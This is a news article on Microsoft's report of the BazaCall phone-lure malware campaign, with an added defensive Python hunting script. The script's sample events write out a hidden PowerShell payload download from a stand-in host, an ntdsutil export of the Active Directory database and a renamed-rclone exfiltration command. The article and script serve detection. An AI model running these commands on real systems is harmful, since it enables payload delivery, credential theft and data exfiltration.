Microsoft is tracking a new malware delivery method: a human-operated attack that first uses email to urge victims to call a phone number, where they are then directed to download a malicious Excel file from a website.
The Microsoft Security Intelligence Twitter account on Tuesday published what it knows about an active BazaCall malware campaign that uses emails to trick victims into calling a number to cancel their supposed subscription to a service.
We’re tracking an active BazaCall malware campaign leading to human-operated attacks and ransomware deployment. BazaCall campaigns use emails that lure recipients to call a number to cancel their supposed subscription to a certain service. pic.twitter.com/RS5wGSndhv
— Microsoft Security Intelligence (@MsftSecIntel) June 22, 2021
Examples posted on Twitter include a fraudulent photo editing service for $59.99 per month and a cooking service for $29.999 per month.
When victims call that number, which connects to what is essentially a fake call center, they are directed to visit a website and download an Excel file to cancel the service. That file contains a malicious macro that downloads the payload, according to Microsoft.
The campaign is named after BazaLoader, the malware it initially distributed, according to Microsoft, which says it observed the attacker using Cobalt Strike to steal credentials – including the Active Directory database – and exfiltrate data using rclone.
The lack of malicious elements in the emails makes this particular campaign hard to detect, the company says.
“The lack of malicious elements in the emails can be a challenge for detection,” the company tweeted from its Security Intelligence account. “Microsoft 365 Defender’s cross-domain visibility allows endpoint signals to inform Microsoft Defender for Office 365 protections against the emails, ensuring comprehensive defense against this attack.”
Microsoft also tweeted a link to a GitHub page that includes advanced hunting queries to help IT teams locate this threat and stop it in its early stages.
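Microsoft's own hunting queries are on the linked GitHub page. As an added illustration that is not part of the original article and is not Microsoft's code, the Python below sketches the kind of endpoint-signal hunting the chain described above invites: Excel spawning a script host (the macro stage), ntdsutil or ntds.dit activity (the Active Directory database theft), and rclone use, including a renamed rclone binary (the exfiltration stage). The event field names, the rule heuristics and the sample events are all assumptions constructed for this example; a real deployment would run the same logic over Sysmon Event ID 1 or Defender DeviceProcessEvents data.

```python
"""Toy hunting pass over process-creation events for a BazaCall-style chain.

Example code added for illustration, not Microsoft's published queries.
Field names are assumed (loosely modelled on Sysmon Event ID 1); the
sample events at the bottom are constructed, not captured telemetry.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class ProcessEvent:
    image: str                    # path of the newly created process
    command_line: str
    parent_image: str
    original_file_name: str = ""  # PE version resource; survives a rename


OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
                "certutil.exe", "msiexec.exe"}

# rclone addresses remotes as "name:path". Require at least two characters
# before the colon so Windows drive letters (C:\...) never match, and skip
# URL schemes so a command line containing http:// is not mistaken for one.
RCLONE_REMOTE = re.compile(r"(?:^|\s)(?!https?:)[A-Za-z][A-Za-z0-9_-]+:")
RCLONE_VERBS = re.compile(r"\b(copy|copyto|sync|move)\b", re.I)


def basename(path: str) -> str:
    """Case-folded file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def office_spawns_script_host(ev: ProcessEvent) -> Optional[str]:
    """Macro stage: an Office app launching a script host or LOLBin."""
    parent, child = basename(ev.parent_image), basename(ev.image)
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        return f"{parent} spawned {child}"
    return None


def ad_database_access(ev: ProcessEvent) -> Optional[str]:
    """Credential theft stage: ntdsutil 'ifm' export or any ntds.dit reference."""
    cmd = ev.command_line.lower()
    if basename(ev.image) == "ntdsutil.exe" and "ifm" in cmd.split():
        return "ntdsutil ifm export"
    if "ntds.dit" in cmd:
        return "command line references ntds.dit"
    return None


def rclone_exfil(ev: ProcessEvent) -> Optional[str]:
    """Exfiltration stage: rclone by name, by OriginalFileName (renamed copy),
    or by a transfer verb plus remote-style target on the command line."""
    if basename(ev.image) == "rclone.exe" or ev.original_file_name.lower() == "rclone.exe":
        return "rclone binary (image name or OriginalFileName)"
    if RCLONE_VERBS.search(ev.command_line) and RCLONE_REMOTE.search(ev.command_line):
        return "rclone-style transfer to a remote"
    return None


RULES = {
    "office_macro_child": office_spawns_script_host,
    "ad_database_theft": ad_database_access,
    "rclone_exfil": rclone_exfil,
}


def hunt(events: List[ProcessEvent]) -> List[Dict[str, object]]:
    """Run every rule over every event; return one hit per (event, rule)."""
    hits = []
    for i, ev in enumerate(events):
        for name, rule in RULES.items():
            detail = rule(ev)
            if detail:
                hits.append({"event": i, "rule": name,
                             "image": basename(ev.image), "detail": detail})
    return hits


# Constructed sample events (assumed paths; example.invalid is a reserved name).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell.exe -w hidden -c "Invoke-WebRequest http://example.invalid/p -OutFile $env:TEMP\p.exe"',
                 r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"EXCEL.EXE C:\Users\alice\Downloads\cancel_subscription.xlsm",
                 r"C:\Windows\explorer.exe"),                      # benign open
    ProcessEvent(r"C:\Windows\System32\ntdsutil.exe",
                 r'ntdsutil "ac i ntds" ifm "create full C:\Temp\ad" q q',
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\ProgramData\svchost.exe",                    # renamed rclone
                 r"svchost.exe copy C:\Users\Public\share mega:exfil --transfers 16",
                 r"C:\Windows\System32\cmd.exe", original_file_name="rclone.exe"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe",                   # benign copy
                 r"cmd.exe /c copy C:\Reports\q2.xlsx D:\Backup\q2.xlsx",
                 r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

The drive-letter exclusion in `RCLONE_REMOTE` is what keeps the ordinary `copy C:\... D:\...` event quiet while a two-plus-character remote such as `mega:` still matches; the OriginalFileName check is the more robust of the two rclone indicators because it catches a copy renamed to look like a system binary, provided the logging pipeline records that field.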
This kind of attack seems simple and thus easy to prevent, but, as Microsoft pointed out, the email itself carries only a phone number rather than a malicious link or attachment, which makes it hard to detect. Further, with employees working from home on work-issued devices, they are more apt to call to cancel a service and perform those tasks on the work device.